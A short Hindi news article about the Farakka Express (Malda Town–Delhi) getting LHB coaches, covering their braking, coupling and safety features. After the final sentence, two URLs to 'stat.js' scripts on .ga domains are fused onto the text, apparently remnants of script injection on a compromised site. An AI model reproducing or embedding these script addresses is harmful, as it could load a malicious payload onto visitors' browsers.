मालदा टाउन से चलकर दिल्ली जाने वाली फरक्का एक्सप्रेस का सफर पहले से आरामदेय होगा। इस यात्रा करने वाले यात्रियों को अब झटका महसूस नहीं होगा। क्योंकि इसमें उच्च सुरक्षा मानक वाले एलएचबी (लिंक हॉफमेन बुश) कोच लगा दिए गए हैं। रेलवे ने रैक के लिए देश के सभी कोच फैक्ट्री को पत्र भेजा है। इसके बाद तैयारी शुरू कर दी गई है। यात्री ट्रेन का परिचालन शुरू होने के बाद फरक्का एक्सप्रेस एलएचबी रैक के साथ चलेगी।

दरअसल, ट्रेन में 23 मार्च तक फरक्का एक्सप्रेस का परिचालन आइसीएफ रैक से हो रहा था। एलएचबी रैक का प्रयोग अभी इस रूट से चलने वाली आठ ट्रेनों में हो रहा है। फरक्का एक्सप्रेस नौवीं ट्रेन होगी। उच्च स्तरीय तकनीक से लैस इस कोच में बेहतर शॉक एक्जावर का उपयोग होता है। जिससे कम आवाज होती है और यात्रियों को झटकों का अहसास नहीं होता।

वजन में हल्के कोच डिस्क ब्रेक के कारण कम समय व कम दूरी में बेहतर काम करते है। सीबीसी कपलिंग के कारण ये कोच दुर्घटना में भी नहीं टूटते और डिब्बे एक-दूसरे पर नहीं चढ़ते। इस तरह शौचालय का इस्तेमाल स्टेशन पर नहीं हो सकता। इसमे जनरल और स्लीपर क्लास की बोगियां भी बढ़ी है।

एलएचबी रैक स्टेनलेस स्टील से बने होते हैं। इंटीरियर डिजाइन एल्यूमीनियम की होती है। सबसे बड़ी खासियत यह है कि अगर ट्रेन दुर्घटनाग्रस्त भी होती है तो कपलिंग के टूटने की आशंका नहीं होती है, जबकि स्क्रू कपलिंग वाले कोचों के डिरेल होने से उसके टूटने का डर बना रहता है।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.